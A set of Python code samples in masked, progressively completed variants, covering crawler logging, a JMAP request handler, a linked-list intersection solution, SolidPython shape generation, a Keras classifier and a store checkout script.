# log_name = log_path + 'icrawlerspider.spider.%s-%s-%s.log' % (year, month, day)
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear() # 多个不同文件名的情况下用这个
if not self.logger.handlers:
# 追加模式,按照日期来设置日志,handlers中TimedRotatingFileHandler就是按照日期来设置,RotatingFileHandler这个按照文件大小来设置
# fh = logging.handlers.TimedRotatingFileHandler(log_name, when='D', interval=1, encoding='utf-8')
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
# fh.setLevel(logging.INFO)
# 定义handler的输出格式
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' + '%s %s %s %s %s '
% (group_code, job_code, jobinst_id, fire_time, address_code) + '%(message)s')
# '%(filename)s->%(funcName)s line:%(lineno)d
fh.setFormatter(formatter)
# 给logger添加handler
self.logger.addHandler(fh)
# 添加下面一句,在记录日志之后移除句柄
# self.logger.info('记录数据')
# self.logger.removeHandler(fh)
            # close the opened file
fh.close()
return self.logger
def log(name):
    def wrapper(func):
        def inner(*args, **kwargs):  # an extra inner layer is needed so result can be returned
            log = ICrawlerLog(name).save
            log.info("{} started executing".format(func))
            try:
                result = func(*args, **kwargs)  # fine as long as the decorator is not applied to a bound method (that would require a self argument)
                if result:
                    log.info("{} executed successfully".format(func))
                    # log.info("result: %s" % result)
                    return result
                else:
                    log.error("{} returned an empty result".format(func))
                    return None
            except Exception as e:
                # traceback.print_exc()
                log.error("{} raised an exception and failed; aborting".format(func))
                log.error(e)
                return False
        return inner
    return wrapper
| [
3,
4,
5,
6,
7
] |
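A minimal usage sketch for the log decorator in the row above, assuming ICrawlerLog(name).save returns a standard logging.Logger as in the sample; the crawl function and its return value here are hypothetical:

@log('spider')
def fetch_page(url):
    # hypothetical crawl step; a falsy return is logged as an empty result
    return {'url': url, 'status': 200}

result = fetch_page('https://example.com')  # logs start and success around the call

Note that the decorator converts exceptions into a False return after logging them, so callers must check the result rather than catch.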
1,680 | aac3b2478980d3a5453451cb848afcfd6aca1743 | <mask token>
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
<mask token>
| <mask token>
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match('^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| <mask token>
CAPABILITIES = {'urn:ietf:params:jmap:core': core,
'urn:ietf:params:jmap:mail': mail}
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match('^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| import logging as log
from time import monotonic
import re
from jmap.account import ImapAccount
import jmap.core as core
import jmap.mail as mail
import jmap.submission as submission
import jmap.vacationresponse as vacationresponse
import jmap.contacts as contacts
import jmap.calendars as calendars
from jmap import errors
CAPABILITIES = {'urn:ietf:params:jmap:core': core,
'urn:ietf:params:jmap:mail': mail}
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match('^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| import logging as log
from time import monotonic
import re
from jmap.account import ImapAccount
import jmap.core as core
import jmap.mail as mail
import jmap.submission as submission
import jmap.vacationresponse as vacationresponse
import jmap.contacts as contacts
import jmap.calendars as calendars
from jmap import errors
CAPABILITIES = {
'urn:ietf:params:jmap:core': core,
'urn:ietf:params:jmap:mail': mail,
# 'urn:ietf:params:jmap:submission': jmap.submission,
# 'urn:ietf:params:jmap:vacationresponse': jmap.vacationresponse,
# 'urn:ietf:params:jmap:contacts': jmap.contacts,
# 'urn:ietf:params:jmap:calendars': jmap.calendars,
}
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
# resolve kwargs
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
# we are updating dict over which we iterate
# please check that your changes don't skip keys
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error',
{'type': 'resultReference', 'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error: continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {
'type': e.__class__.__name__,
'message': str(e),
}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
# log method call
if kwargs.get('ids', None):
logbit += " [" + (",".join(kwargs['ids'][:4]))
if len(kwargs['ids']) > 4:
logbit += ", ..." + str(len(kwargs['ids']))
logbit += "]"
if kwargs.get('properties', None):
logbit += " (" + (",".join(kwargs['properties'][:4]))
if len(kwargs['properties']) > 4:
logbit += ", ..." + str(len(kwargs['properties']))
logbit += ")"
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {
'methodResponses': results,
'sessionState': user.sessionState,
}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) -> ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match(r'^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| [
6,
7,
8,
9,
10
] |
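A short illustration of the JMAP back-reference resolution performed by _parsepath in the row above (result paths in the style of RFC 8620 section 3.7, usable if the sample's module is imported); the response dict is made up:

prev = {'ids': ['m1', 'm2'], 'list': [{'id': 'm1'}, {'id': 'm2'}]}
# an argument like {'#ids': {'resultOf': 't0', 'path': '/ids'}} resolves to:
assert _parsepath('/ids', prev) == ['m1', 'm2']
# '*' fans out over list elements and flattens one level:
assert _parsepath('/list/*/id', prev) == ['m1', 'm2']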
1,681 | 66f60eb86137203a74656be13b631384eba30c84 | class Solution(object):
<mask token>
<mask token>
<mask token>
| class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
        if index == 0:  # no matching suffix: the lists do not intersect
return None
return self.get_nth_node(headA, len(l1) - index + 1)
<mask token>
<mask token>
| class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
        if index == 0:  # no matching suffix: the lists do not intersect
return None
return self.get_nth_node(headA, len(l1) - index + 1)
<mask token>
def get_nth_node(self, head, n):
try:
c = 1
while c < n:
head = head.next
c += 1
return head
except IndexError:
return None
| class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
        if index == 0:  # no matching suffix: the lists do not intersect
return None
return self.get_nth_node(headA, len(l1) - index + 1)
def linkList_to_list(self, head):
if not head:
return []
l = []
while head:
l.append(head.val)
head = head.next
return l
def get_nth_node(self, head, n):
try:
c = 1
while c < n:
head = head.next
c += 1
return head
except IndexError:
return None
| # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
        if index == 0:  # no matching suffix: the lists do not intersect
return None
return self.get_nth_node(headA, len(l1) - index + 1)
def linkList_to_list(self, head):
if not head:
return []
l = []
while head:
l.append(head.val)
head = head.next
return l
def get_nth_node(self, head, n):
try:
c = 1
while c < n:
head = head.next
c += 1
return head
except IndexError:
return None
| [
1,
2,
3,
4,
5
] |
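For contrast with the value-comparison approach in the row above, a sketch of the standard O(1)-space two-pointer technique for the same problem (ListNode as in the sample's header comment); this compares node identity, which is what the underlying exercise actually asks for:

def get_intersection_node(headA, headB):
    # Each pointer walks its own list, then restarts on the other head;
    # after at most len(A) + len(B) steps both meet at the shared node or at None.
    a, b = headA, headB
    while a is not b:
        a = a.next if a else headB
        b = b.next if b else headA
    return a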
1,682 | 27ca60435c614e4d748917da45fc2fc75ee59f1c | <mask token>
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
<mask token>
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
<mask token>
| <mask token>
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,
makeNothingBox, makeCylindBeam, makeHollowCylindBeam,
makeHollowCone, makeEye]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(bf(5, 4, 5), translate([0, 0, 5])(cf(4,
3, 5)), translate([0, 0, 10])(bf2(5, 4, 5)))
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
<mask token>
| <mask token>
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,
makeNothingBox, makeCylindBeam, makeHollowCylindBeam,
makeHollowCone, makeEye]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(bf(5, 4, 5), translate([0, 0, 5])(cf(4,
3, 5)), translate([0, 0, 10])(bf2(5, 4, 5)))
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
if __name__ == '__main__':
out_dir = sys.argv[1] if len(sys.argv) > 1 else os.curdir
file_out = os.path.join(out_dir, 'basic_geometry.scad')
shape_list = basic_geometry()
for i, shape in enumerate(shape_list):
export(shape, 'output' + str(i))
print('Created OpenSCAD file...')
print('Compiling STL file...')
| from __future__ import division
import os
from solid import *
from solid.utils import *
from shapes import *
import sys
from solid import *
from solid.utils import *
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,
makeNothingBox, makeCylindBeam, makeHollowCylindBeam,
makeHollowCone, makeEye]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(bf(5, 4, 5), translate([0, 0, 5])(cf(4,
3, 5)), translate([0, 0, 10])(bf2(5, 4, 5)))
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
if __name__ == '__main__':
out_dir = sys.argv[1] if len(sys.argv) > 1 else os.curdir
file_out = os.path.join(out_dir, 'basic_geometry.scad')
shape_list = basic_geometry()
for i, shape in enumerate(shape_list):
export(shape, 'output' + str(i))
print('Created OpenSCAD file...')
print('Compiling STL file...')
| #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import os
from solid import *
from solid.utils import *
from shapes import *
import sys
# Assumes SolidPython is in site-packages or elsewhwere in sys.path
from solid import *
from solid.utils import *
def voxels():
# shape = cube([1, 1, 1], center=False);
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0,0,1, 0.5])(cube([1, 1, 1], center=False));
# shape = (shape+new_cube)
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,makeNothingBox, makeCylindBeam, makeHollowCylindBeam, makeHollowCone, makeEye]
# cylind_functions = [makeCylindBeam, makeHollowCylindBeam, makeHollowCone, makeEye, makeNothingCylind]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(
# translate([-2, -3, 0])(
bf(5, 4, 5),
translate([0, 0, 5])(
cf(4, 3, 5)),
translate([0, 0, 10])(
bf2(5, 4, 5))
)
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
return shape_list
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print("Success")
if __name__ == '__main__':
out_dir = sys.argv[1] if len(sys.argv) > 1 else os.curdir
file_out = os.path.join(out_dir, 'basic_geometry.scad')
shape_list = basic_geometry()
for i, shape in enumerate(shape_list):
export(shape, "output" + str(i))
print("Created OpenSCAD file...")
print("Compiling STL file...") | [
2,
3,
4,
5,
6
] |
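One detail worth flagging in the row above: voxels() computes translate([x, y, z]) but never applies it, so every cube lands at the origin. A corrected sketch of that loop in SolidPython's composition style (SEGMENTS is assumed to be 48 here, since export() references it without the sample ever defining it):

SEGMENTS = 48  # assumed; not defined anywhere in the sample

def voxels():
    shape = []
    for x in range(-5, 4):
        for y in range(-5, 4):
            for z in range(0, 10):
                # apply the translation to the cube instead of discarding it
                voxel = translate([x, y, z])(
                    color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False)))
                shape.append(voxel)
    return shape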
1,683 | 7282af4186a976296ac50840e9169b78a66e118b | <mask token>
| <mask token>
np.random.seed(1)
<mask token>
encoder.fit(Y)
<mask token>
model.add(Dense(5, input_dim=len(X[0])))
model.add(Dense(32, activation='relu'))
model.add(Dense(len(onehot_Y[0]), activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
<mask token>
print('Accuracy:', accuracy, '%')
| <mask token>
np.random.seed(1)
df, meta = pyreadstat.read_sav('RESIDIV_Vimala.sav', usecols=[
'Sympt_blødning', 'Sympt_smerter', 'Sympt_ascites', 'Sympt_fatigue',
'Lengde_sympt_dager', 'Lengde_sympt_uker', 'Lengde_sympt_mnd', 'kreftform']
)
dataset = df.drop('kreftform', axis=1)
X = dataset.values
Y = df['kreftform'].values
encoder = LabelEncoder()
encoder.fit(Y)
encoded_Y = encoder.transform(Y)
onehot_Y = np_utils.to_categorical(encoded_Y)
model = Sequential()
model.add(Dense(5, input_dim=len(X[0])))
model.add(Dense(32, activation='relu'))
model.add(Dense(len(onehot_Y[0]), activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
accuracy = '%.2f' % (model.evaluate(X, onehot_Y)[1] * 100)
print('Accuracy:', accuracy, '%')
| import pyreadstat
import matplotlib.pyplot as plt
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder
np.random.seed(1)
df, meta = pyreadstat.read_sav('RESIDIV_Vimala.sav', usecols=[
'Sympt_blødning', 'Sympt_smerter', 'Sympt_ascites', 'Sympt_fatigue',
'Lengde_sympt_dager', 'Lengde_sympt_uker', 'Lengde_sympt_mnd', 'kreftform']
)
dataset = df.drop('kreftform', axis=1)
X = dataset.values
Y = df['kreftform'].values
encoder = LabelEncoder()
encoder.fit(Y)
encoded_Y = encoder.transform(Y)
onehot_Y = np_utils.to_categorical(encoded_Y)
model = Sequential()
model.add(Dense(5, input_dim=len(X[0])))
model.add(Dense(32, activation='relu'))
model.add(Dense(len(onehot_Y[0]), activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=[
'accuracy'])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
accuracy = '%.2f' % (model.evaluate(X, onehot_Y)[1] * 100)
print('Accuracy:', accuracy, '%')
| import pyreadstat
import matplotlib.pyplot as plt
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder
# Set random seed for reproducible results
np.random.seed(1)
# Read sav file and create a pandas dataframe and extract metadata
df, meta = pyreadstat.read_sav("RESIDIV_Vimala.sav", usecols=["Sympt_blødning", "Sympt_smerter", "Sympt_ascites", "Sympt_fatigue", "Lengde_sympt_dager", "Lengde_sympt_uker", "Lengde_sympt_mnd", "kreftform"])
dataset = df.drop("kreftform", axis=1)
# dataset[0] is Y (kreftform), dataset[1, 2, 3 and 4] is X
X = dataset.values
Y = df["kreftform"].values
# encode class values as integers
encoder = LabelEncoder()
encoder.fit(Y)
encoded_Y = encoder.transform(Y)
# convert integers to dummy variables (i.e. one-hot encoded)
onehot_Y = np_utils.to_categorical(encoded_Y)
model = Sequential()
model.add(Dense(5, input_dim=(len(X[0]))))
model.add(Dense(32, activation="relu"))
model.add(Dense(len(onehot_Y[0]), activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.fit(X, onehot_Y, validation_split=0.33, epochs=1000)
accuracy = "%.2f" % (model.evaluate(X, onehot_Y)[1]*100)
print("Accuracy:", accuracy, "%")
| [
0,
1,
2,
3,
4
] |
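A caveat on the last two lines of the row above: evaluating on the same X used for fitting overstates accuracy. A held-out evaluation sketch (hypothetical split via scikit-learn, keeping the sample's epoch count):

from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(
    X, onehot_Y, test_size=0.33, random_state=1)
model.fit(X_train, y_train, epochs=1000)
loss, acc = model.evaluate(X_test, y_test)  # accuracy on unseen rows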
1,684 | 333d237dd4a203fcfde3668901d725f16fbc402e | <mask token>
| print('-' * 100)
print('BIENVENIDOS A TIENDA ELEGANCIA')
print('-' * 100)
<mask token>
print(prendaseleccionada1)
<mask token>
print('La prenda: ', tipoPrenda1, 'participa de del plan SuperPuntos? s/n')
<mask token>
if valor1 == 's':
v1 = 's'
valor1 = precio1
superPuntos = superPuntos + precio1
elif valor1 == 'n':
v1 = 'n'
valor1 = 0
<mask token>
print(prendaseleccionada2)
<mask token>
print('La prenda: ', tipoPrenda2, 'participa de del plan SuperPuntos? s/n')
<mask token>
if valor2 == 's':
v2 = 's'
valor2 = precio2
superPuntos = superPuntos + precio2
elif valor2 == 'n':
v2 = 'n'
valor2 = 0
<mask token>
print(prendaseleccionada3)
<mask token>
print('La prenda: ', tipoPrenda3, 'participa de del plan SuperPuntos? s/n')
<mask token>
if valor3 == 's':
v3 = 's'
valor3 = precio3
superPuntos = superPuntos + precio3
elif valor3 == 'n':
v3 = 'n'
valor3 = 0
if tipoPrenda1 == tipoPrenda2 == tipoPrenda3:
if precio1 < precio2 and precio1 < precio3:
precio1 = 0
elif precio2 < precio3:
precio2 = 0
else:
precio3 = 0
if tipoPrenda1 == tipoPrenda2 and tipoPrenda1 != tipoPrenda3:
if precio1 > precio2:
precio1 = precio1 / 2
else:
precio2 = precio2 / 2
if tipoPrenda1 == tipoPrenda3 and tipoPrenda1 != tipoPrenda2:
if precio1 > precio3:
precio1 = precio1 / 2
else:
precio3 = precio3 / 2
if tipoPrenda2 == tipoPrenda3 and tipoPrenda2 != tipoPrenda1:
if precio2 > precio3:
precio2 = precio2 / 2
else:
precio3 = precio3 / 2
<mask token>
if formaDePago == 1:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
elif formaDePago == 2:
cuotas = int(input('ingrese en cuantas cuotas desea pagar:'))
if cuotas <= 3:
formaDePago = 'Tarjeta (%2 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 102
elif cuotas > 3:
formaDePago = 'Tarjeta (%5 de Recarga) cantidad de cuotas:', cuotas
montoAPagar = precioTotal / 100 * 105
elif cuotas <= 0:
formaDePago = 'Contado (%10 de Descuento)'
montoAPagar = precioTotal / 100 * 90
if valor1 > 0 and valor2 > 0 and valor3 > 0:
superPuntos = superPuntos * 2
print('----------------------------------------------------')
print('Tienda Elegancia')
print('Tipo, Precio, SuperPuntos')
print(prendaseleccionada1, precioinicial1, v1)
print(prendaseleccionada2, precioinicial2, v2)
print(prendaseleccionada3, precioinicial3, v3)
print('Total sin promo: ', precioSinPromo)
